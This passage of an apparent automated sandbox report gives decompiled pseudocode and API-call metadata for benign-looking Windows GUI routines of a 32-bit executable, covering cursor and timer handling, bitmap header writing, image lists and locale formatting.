                                                                        					__eflags = E0043CC2C( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
                                                                        					if(__eflags != 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					__eflags = E0043B7C0( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
                                                                        					if(__eflags <= 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					_t303 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
                                                                        					__eflags = _t303;
                                                                        					if(_t303 == 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					__eflags = _v20 - 0x12;
                                                                        					if(_v20 != 0x12) {
                                                                        						goto L47;
                                                                        					}
                                                                        					_t209 =  *0x495c2c; // 0x496c08
                                                                        					SetCursor(E0045469C( *_t209,  *((short*)(0x47a9d0 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
                                                                        					 *((intOrPtr*)(_t242 + 0xc)) = 1;
                                                                        					goto L49;
                                                                        				}
                                                                        				_t213 = _t191 - 0x1e0;
                                                                        				if(_t213 == 0) {
                                                                        					_t214 = _v8;
                                                                        					__eflags =  *(_t214 + 0x60);
                                                                        					if( *(_t214 + 0x60) != 0) {
                                                                        						E00440A00(_v8);
                                                                        						E00407314( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
                                                                        						_t219 = _v8;
                                                                        						 *(_t219 + 0x50) = _v72;
                                                                        						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
                                                                        						E00440E88(_t306);
                                                                        						E00440A00(_v8);
                                                                        					}
                                                                        					goto L47;
                                                                        				}
                                                                        				if(_t213 == 1) {
                                                                        					E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                                                        					_t256 =  &_v20;
                                                                        					_t304 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
                                                                        					__eflags = _t304;
                                                                        					if(_t304 == 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					__eflags = _v20 - 0x12;
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _v20 - 2;
                                                                        						if(_v20 != 2) {
                                                                        							goto L47;
                                                                        						}
                                                                        						_t232 = PeekMessageA( &_v64, E0043CC2C( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
                                                                        						__eflags = _t232;
                                                                        						if(_t232 == 0) {
                                                                        							_t289 =  *0x4323f0; // 0x43243c
                                                                        							_t236 = E00403768( *((intOrPtr*)(_t304 + 4)), _t289);
                                                                        							__eflags = _t236;
                                                                        							if(_t236 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc0))();
                                                                        							}
                                                                        						}
                                                                        						_t233 =  *((intOrPtr*)(_t304 + 4));
                                                                        						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
                                                                        						if( *((char*)(_t233 + 0x9b)) == 1) {
                                                                        							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
                                                                        							if( *((char*)(_t233 + 0x5d)) == 1) {
                                                                        								E00436C54(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
                                                                        							}
                                                                        						}
                                                                        						goto L49;
                                                                        					}
                                                                        					E004408EC(_v8,  &_v16, _t304, __eflags);
                                                                        				} else {
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 0044115C
                                                                        • SetCursor.USER32(00000000,?,00000000,004412F4), ref: 004411EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Cursor
                                                                        • String ID: <$C
                                                                        • API String ID: 3268636600-3423417450
                                                                        • Opcode ID: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction ID: 53dfb2be38ad3f3824fe0bc66c4258adf9aa410c39980d357e277dc970e496b8
                                                                        • Opcode Fuzzy Hash: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction Fuzzy Hash: 81C15E34A00219DFDB10DFA9C585A9EB3F1BF44304F1485A6E900EB365D778EE85CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E0045FE24(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				signed int _v9;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				char _v21;
                                                                        				char _v124;
                                                                        				char _v132;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t145;
                                                                        				intOrPtr _t169;
                                                                        				intOrPtr _t171;
                                                                        				intOrPtr _t172;
                                                                        				intOrPtr _t173;
                                                                        				signed int _t177;
                                                                        				signed int _t184;
                                                                        				intOrPtr _t193;
                                                                        				signed int _t197;
                                                                        				signed int _t204;
                                                                        				intOrPtr _t213;
                                                                        				intOrPtr _t215;
                                                                        				signed int _t224;
                                                                        				signed int _t237;
                                                                        				signed int _t240;
                                                                        				void* _t248;
                                                                        				void* _t252;
                                                                        				signed int _t253;
                                                                        				intOrPtr _t268;
                                                                        				intOrPtr _t284;
                                                                        				void* _t295;
                                                                        				signed int _t297;
                                                                        				intOrPtr _t304;
                                                                        
                                                                        				_v9 = __ecx;
                                                                        				_t253 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t294 = _a8;
                                                                        				_v21 = 0;
                                                                        				E00460CD8(_v8, __edx, _a8, _t295);
                                                                        				_t145 = _v8;
                                                                        				_t305 =  *(_t145 + 0x1c) & 0x00000010;
                                                                        				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
                                                                        					L5:
                                                                        					__eflags = _t253;
                                                                        					if(_t253 != 0) {
                                                                        						L8:
                                                                        						__eflags = _t253;
                                                                        						if(_t253 != 0) {
                                                                        							L37:
                                                                        							_push(0x4601cf);
                                                                        							_push( *[fs:eax]);
                                                                        							 *[fs:eax] = _t304;
                                                                        							E00437B78(_v8, _t253, _a4, _t294);
                                                                        							_pop(_t268);
                                                                        							 *[fs:eax] = _t268;
                                                                        							return 0;
                                                                        						}
                                                                        						E0045D74C(_v8,  &_v124);
                                                                        						_t296 =  *_v8;
                                                                        						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
                                                                        						__eflags =  *((char*)(_v8 + 0x28e));
                                                                        						if(__eflags != 0) {
                                                                        							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
                                                                        							if(__eflags == 0) {
                                                                        								_t296 = 0xffc8;
                                                                        								_t237 = E004037D8(_v8, __eflags);
                                                                        								__eflags = _t237;
                                                                        								if(_t237 != 0) {
                                                                        									_t240 = E00435FB0(_v8) -  *(_v8 + 0x264);
                                                                        									__eflags = _t240;
                                                                        									 *(_v8 + 0x264) = _t240;
                                                                        								}
                                                                        							}
                                                                        							return E0045E140(_v8, _t253,  &_v124, _t294, _t296);
                                                                        						}
                                                                        						_t259 = _a4;
                                                                        						E0045D6F0(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
                                                                        						_t169 = _v8;
                                                                        						_t297 = _v20;
                                                                        						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
                                                                        						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
                                                                        							L25:
                                                                        							_t171 = _v8;
                                                                        							__eflags =  *(_t171 + 0x249) & 0x00000001;
                                                                        							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
                                                                        								L31:
                                                                        								_t172 = _v8;
                                                                        								__eflags =  *(_t172 + 0x249) & 0x00000002;
                                                                        								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
                                                                        									__eflags = _v16;
                                                                        									if(_v16 >= 0) {
                                                                        										_t173 = _v8;
                                                                        										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
                                                                        										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
                                                                        											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
                                                                        											if(__eflags <= 0) {
                                                                        												_t177 = _v20;
                                                                        												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
                                                                        												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
                                                                        												E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
                                                                        												_push( &_v132);
                                                                        												_t184 = E004037D8(_v8, __eflags);
                                                                        												__eflags = _t184;
                                                                        												if(_t184 != 0) {
                                                                        													 *((char*)(_v8 + 0x28e)) = 5;
                                                                        													 *((intOrPtr*)( *_v8 + 0x88))();
                                                                        													E0045E280(_v8, _t253, _t294, 0xffa3);
                                                                        													_v21 = 1;
                                                                        													SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L37;
                                                                        							}
                                                                        							__eflags = _v20;
                                                                        							if(_v20 < 0) {
                                                                        								goto L31;
                                                                        							}
                                                                        							_t193 = _v8;
                                                                        							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
                                                                        							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
                                                                        								goto L31;
                                                                        							}
                                                                        							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
                                                                        							if(__eflags > 0) {
                                                                        								goto L31;
                                                                        							}
                                                                        							_t197 = _v16;
                                                                        							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
                                                                        							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
                                                                        							E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
                                                                        							_push( &_v132);
                                                                        							_t204 = E004037D8(_v8, __eflags);
                                                                        							__eflags = _t204;
                                                                        							if(_t204 != 0) {
                                                                        								 *((char*)(_v8 + 0x28e)) = 4;
                                                                        								 *((intOrPtr*)( *_v8 + 0x88))();
                                                                        								E0045E280(_v8, _t253, _t294, 0xffa2);
                                                                        								_v21 = 1;
                                                                        								SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
                                                                        							}
                                                                        							goto L37;
                                                                        						}
                                                                        						_t213 = _v8;
                                                                        						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
                                                                        						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
                                                                        							goto L25;
                                                                        						}
                                                                        						_t215 = _v8;
                                                                        						__eflags =  *(_t215 + 0x249) & 0x00000004;
                                                                        						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
                                                                        							 *((char*)(_v8 + 0x28e)) = 1;
                                                                        							SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
                                                                        							__eflags = _v9 & 0x00000001;
                                                                        							if((_v9 & 0x00000001) == 0) {
                                                                        								E0045EDB8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
                                                                        							} else {
                                                                        								E0045ED30(_v8, _t259,  &_v20, _t294);
                                                                        							}
                                                                        							goto L37;
                                                                        						}
                                                                        						_t284 = _v8;
                                                                        						_t224 = _v20;
                                                                        						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
                                                                        						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
                                                                        							L20:
                                                                        							E0045EDB8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
                                                                        							E00460DB4(_v8, _t294, _t297);
                                                                        							L21:
                                                                        							E004037D8(_v8, __eflags);
                                                                        							goto L37;
                                                                        						}
                                                                        						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
                                                                        						if(__eflags != 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						E0045C698(_v8);
                                                                        						goto L21;
                                                                        					}
                                                                        					__eflags = _v9 & 0x00000040;
                                                                        					if(__eflags == 0) {
                                                                        						goto L8;
                                                                        					} else {
                                                                        						E004037D8(_v8, __eflags);
                                                                        						goto L37;
                                                                        					}
                                                                        				}
                                                                        				if(E004037D8(_v8, _t305) != 0) {
                                                                        					L3:
                                                                        					 *((intOrPtr*)( *_v8 + 0xc0))();
                                                                        					_t248 = E0045C608(_v8, _t307);
                                                                        					_t308 = _t248;
                                                                        					if(_t248 == 0) {
                                                                        						return E004367E4(_v8, 0, _t308);
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				_t252 = E0044DA34(_v8);
                                                                        				_t307 = _t252;
                                                                        				if(_t252 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L3;
                                                                        			}


                                                                        APIs
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045FFF9
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004600E4
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004601A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Timer
                                                                        • String ID: @
                                                                        • API String ID: 2870079774-2766056989
                                                                        • Opcode ID: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction ID: ca72aae42d446a3379f6ca7453f2662bbf2d4cae35f29f2d7e84bd41c12cedf4
                                                                        • Opcode Fuzzy Hash: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction Fuzzy Hash: CCC14A34A04208EFDB00DB99C985FDEB7F5AF09304F2441A6E844AB392DB79AF45DB45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004258E4(void* __eax, signed int __ecx, intOrPtr* __edx, void* __eflags) {
                                                                        				void* __ebp;
                                                                        				signed int _t93;
                                                                        				void* _t108;
                                                                        				signed int _t114;
                                                                        				void* _t125;
                                                                        				signed int _t140;
                                                                        				signed int _t146;
                                                                        				signed int _t160;
                                                                        				intOrPtr _t197;
                                                                        				intOrPtr* _t201;
                                                                        				void* _t202;
                                                                        				intOrPtr _t204;
                                                                        				signed int* _t205;
                                                                        
                                                                        				_t160 = __ecx;
                                                                        				_t201 = __edx;
                                                                        				_t202 = __eax;
                                                                        				E00402EF0( &(_t205[4]), 0xe);
                                                                        				_t205[4] = 0x4d42;
                                                                        				_t203 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c));
                                                                        				if( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)) != 0) {
                                                                        					 *_t205 = E0041694C(_t203);
                                                                        					if(_t160 != 0) {
                                                                        						E00416B7C(_t201, 4, _t205);
                                                                        					}
                                                                        					E0041694C( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)));
                                                                        					return  *((intOrPtr*)( *_t201 + 0xc))();
                                                                        				}
                                                                        				E004249D0(_t202, 0xe);
                                                                        				_t204 =  *((intOrPtr*)(_t202 + 0x28));
                                                                        				 *_t205 = 0;
                                                                        				_t93 =  *(_t204 + 0x14);
                                                                        				__eflags = _t93;
                                                                        				if(__eflags != 0) {
                                                                        					 *_t205 =  *_t205 + _t205[2] + 0xe;
                                                                        					E00402EF0( &(_t205[4]), 0xe);
                                                                        					_t205[4] = 0x4d42;
                                                                        					_t125 = E00424894(_t202);
                                                                        					_t197 =  *0x425b98; // 0x1
                                                                        					E00420804(_t125, 0, _t197);
                                                                        					_t205[3] = E00420B28(SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4),  *(_t204 + 0x14)));
                                                                        					_t205[1] = GetDIBColorTable( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), 0, 0x100,  &(_t205[0xa]));
                                                                        					SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), _t205[3]);
                                                                        					_t140 =  *(_t204 + 0x50);
                                                                        					__eflags = _t140;
                                                                        					if(_t140 > 0) {
                                                                        						__eflags = _t140 - _t205[1];
                                                                        						if(_t140 < _t205[1]) {
                                                                        							_t205[1] = _t140;
                                                                        						}
                                                                        					}
                                                                        					__eflags =  *((char*)(_t204 + 0x70));
                                                                        					if( *((char*)(_t204 + 0x70)) == 0) {
                                                                        						__eflags = _t205[1];
                                                                        						if(_t205[1] == 0) {
                                                                        							__eflags =  *(_t204 + 0x10);
                                                                        							if( *(_t204 + 0x10) != 0) {
                                                                        								__eflags =  *((char*)(_t204 + 0x71));
                                                                        								if( *((char*)(_t204 + 0x71)) == 0) {
                                                                        									_t205[1] = E004212BC( *(_t204 + 0x10), 0xff,  &(_t205[0xa]));
                                                                        									__eflags =  *((short*)(_t204 + 0x3e)) - 8;
                                                                        									if( *((short*)(_t204 + 0x3e)) > 8) {
                                                                        										_t146 = _t205[1] << 2;
                                                                        										 *_t205 =  *_t205 + _t146;
                                                                        										_t47 =  &(_t205[2]);
                                                                        										 *_t47 = _t205[2] + _t146;
                                                                        										__eflags =  *_t47;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_t205[4] =  *_t205;
                                                                        					_t93 = _t205[2] + 0xe;
                                                                        					__eflags = _t93;
                                                                        					_t205[6] = _t93;
                                                                        				}
                                                                        				__eflags = _t160;
                                                                        				if(_t160 != 0) {
                                                                        					_t93 = E00416B7C(_t201, 4, _t205);
                                                                        				}
                                                                        				__eflags =  *_t205;
                                                                        				if( *_t205 == 0) {
                                                                        					return _t93;
                                                                        				} else {
                                                                        					E004239AC(_t204 + 0x18);
                                                                        					__eflags = _t205[1];
                                                                        					if(_t205[1] == 0) {
                                                                        						L27:
                                                                        						__eflags =  *((char*)(_t204 + 0x70));
                                                                        						if( *((char*)(_t204 + 0x70)) == 0) {
                                                                        							E00416B7C(_t201, 0xe,  &(_t205[4]));
                                                                        							E00416B7C(_t201, 0x28, _t204 + 0x30);
                                                                        							__eflags =  *((short*)(_t204 + 0x3e)) - 8;
                                                                        							if( *((short*)(_t204 + 0x3e)) > 8) {
                                                                        								__eflags =  *(_t204 + 0x40) & 0x00000003;
                                                                        								if(( *(_t204 + 0x40) & 0x00000003) != 0) {
                                                                        									E00416B7C(_t201, 0xc, _t204 + 0x58);
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t108 = _t204 + 0x30;
                                                                        							_t205[7] = 0xc;
                                                                        							_t205[8] =  *((intOrPtr*)(_t108 + 4));
                                                                        							_t205[9] =  *((intOrPtr*)(_t108 + 8));
                                                                        							_t205[9] = 1;
                                                                        							_t205[0xa].rgbBlue =  *((intOrPtr*)(_t108 + 0xe));
                                                                        							E00416B7C(_t201, 0xe,  &(_t205[4]));
                                                                        							E00416B7C(_t201, 0xc,  &(_t205[7]));
                                                                        						}
                                                                        						__eflags = 0 * _t205[1];
                                                                        						E00416B7C(_t201, 0 * _t205[1],  &(_t205[0xa]));
                                                                        						return E00416B7C(_t201,  *((intOrPtr*)(_t204 + 0x44)),  *((intOrPtr*)(_t204 + 0x2c)));
                                                                        					}
                                                                        					_t114 =  *(_t204 + 0x50);
                                                                        					__eflags = _t114;
                                                                        					if(_t114 == 0) {
                                                                        						L24:
                                                                        						 *(_t204 + 0x50) = _t205[1];
                                                                        						L25:
                                                                        						__eflags =  *((char*)(_t204 + 0x70));
                                                                        						if( *((char*)(_t204 + 0x70)) != 0) {
                                                                        							E00420F98( &(_t205[0xa]),  &(_t205[1]));
                                                                        						}
                                                                        						goto L27;
                                                                        					}
                                                                        					__eflags = _t114 - _t205[1];
                                                                        					if(_t114 == _t205[1]) {
                                                                        						goto L25;
                                                                        					}
                                                                        					goto L24;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • SelectObject.GDI32(?,?), ref: 004259E0
                                                                        • GetDIBColorTable.GDI32(?,00000000,00000100,?,?,?), ref: 00425A01
                                                                        • SelectObject.GDI32(?,?), ref: 00425A16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ObjectSelect$ColorTable
                                                                        • String ID: BM
                                                                        • API String ID: 2377976745-2348483157
                                                                        • Opcode ID: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction ID: 6c74de65949b55c7261e36db3c671f3cf5b5c64a81c24a0a4976f9b404168564
                                                                        • Opcode Fuzzy Hash: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction Fuzzy Hash: BC8116707083559BD710EF28D485BAE77E1AF88314F44892EF889CB391D778E985CB4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00443A2C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr* _v16;
                                                                        				intOrPtr* _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				intOrPtr _t60;
                                                                        				void* _t102;
                                                                        				intOrPtr _t106;
                                                                        				void* _t112;
                                                                        				intOrPtr _t126;
                                                                        				intOrPtr _t141;
                                                                        				void* _t148;
                                                                        				void* _t149;
                                                                        				intOrPtr _t150;
                                                                        
                                                                        				_t148 = _t149;
                                                                        				_t150 = _t149 + 0xffffffe8;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_v28 = 0;
                                                                        				_v24 = 0;
                                                                        				_t112 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t148);
                                                                        				_push(0x443c43);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t150;
                                                                        				if(E00443514(_v8) == 0) {
                                                                        					L6:
                                                                        					E004037D8(_v8, __eflags);
                                                                        					__eflags = 0;
                                                                        					_pop(_t126);
                                                                        					 *[fs:eax] = _t126;
                                                                        					_push(0x443c4a);
                                                                        					return E0040436C( &_v28, 2);
                                                                        				} else {
                                                                        					E004442B8(_v8, __edx, __ecx, __ecx, __ecx);
                                                                        					_v12 = E004438EC(_v8, __edx, _a4, __ecx, __ecx);
                                                                        					if(_v12 == 0xffffffff) {
                                                                        						_t60 =  *0x4958fc; // 0x41d54c
                                                                        						E00406548(_t60,  &_v28);
                                                                        						E0040A17C(_v28, 1);
                                                                        						E00403DA8();
                                                                        						goto L6;
                                                                        					} else {
                                                                        						 *[fs:eax] = _t150;
                                                                        						_v16 = E004242CC(1);
                                                                        						 *[fs:eax] = _t150;
                                                                        						 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x443bd4, _t148,  *[fs:eax], 0x443bf4, _t148);
                                                                        						 *((intOrPtr*)( *_v16 + 0x40))();
                                                                        						_v20 = E004242CC(1);
                                                                        						 *[fs:eax] = _t150;
                                                                        						E004256E4(_v20, 1);
                                                                        						 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x443bb7, _t148);
                                                                        						 *((intOrPtr*)( *_v20 + 0x40))();
                                                                        						L00426AD8();
                                                                        						L00426AD8();
                                                                        						_push( *((intOrPtr*)( *_v16 + 0x64))( *((intOrPtr*)( *_v20 + 0x64))(E004436E8(_v8), _v12, E00420730(E00424894(_v20)), 0, 0, 0x10, E004436E8(_v8), _v12, E00420730(E00424894(_v16)), 0, 0, 0)));
                                                                        						_push(_t112);
                                                                        						_t102 = E004436E8(_v8);
                                                                        						_push(_t102);
                                                                        						L00426AE0();
                                                                        						if(_t102 == 0) {
                                                                        							_t106 =  *0x4958fc; // 0x41d54c
                                                                        							E00406548(_t106,  &_v24);
                                                                        							E0040A17C(_v24, 1);
                                                                        							E00403DA8();
                                                                        						}
                                                                        						_pop(_t141);
                                                                        						 *[fs:eax] = _t141;
                                                                        						_push(0x443bbe);
                                                                        						return E004035DC(_v20);
                                                                        					}
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 004438EC: 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B30
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000010,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4), ref: 00443B56
                                                                        • 73452330.COMCTL32(00000000,?,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B77
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73452500$73452073452330LoadString
                                                                        • String ID: DA
                                                                        • API String ID: 579128689-2080325668
                                                                        • Opcode ID: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction ID: d8424a2b104fe4f1d5b96f464bae46b84877e40d637dfa1592dbc8658c5b6140
                                                                        • Opcode Fuzzy Hash: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction Fuzzy Hash: 79511074A00215EFD700EFA9D892E9DB7F5FF49705F6144A6F800AB761CA35AE00DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00409D0C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				void* _t41;
                                                                        				signed int _t45;
                                                                        				signed int _t47;
                                                                        				signed int _t49;
                                                                        				signed int _t51;
                                                                        				intOrPtr _t75;
                                                                        				void* _t76;
                                                                        				signed int _t77;
                                                                        				signed int _t83;
                                                                        				signed int _t92;
                                                                        				intOrPtr _t111;
                                                                        				void* _t122;
                                                                        				void* _t124;
                                                                        				intOrPtr _t127;
                                                                        				void* _t128;
                                                                        
                                                                        				_t128 = __eflags;
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_t122 = __edx;
                                                                        				_t124 = __eax;
                                                                        				_push(_t127);
                                                                        				_push(0x409ed6);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t127;
                                                                        				_t92 = 1;
                                                                        				E00404348(__edx);
                                                                        				E004099D4(GetThreadLocale(), 0x409eec, 0x1009,  &_v12);
                                                                        				if(E004087C0(0x409eec, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                        					while(1) {
                                                                        						_t41 = E00404600(_t124);
                                                                        						__eflags = _t92 - _t41;
                                                                        						if(_t92 > _t41) {
                                                                        							goto L28;
                                                                        						}
                                                                        						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                        						asm("bt [0x47a0c0], eax");
                                                                        						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                        							_t45 = E00408D38(_t124 + _t92 - 1, 2, 0x409ef0);
                                                                        							__eflags = _t45;
                                                                        							if(_t45 != 0) {
                                                                        								_t47 = E00408D38(_t124 + _t92 - 1, 4, 0x409f00);
                                                                        								__eflags = _t47;
                                                                        								if(_t47 != 0) {
                                                                        									_t49 = E00408D38(_t124 + _t92 - 1, 2, 0x409f18);
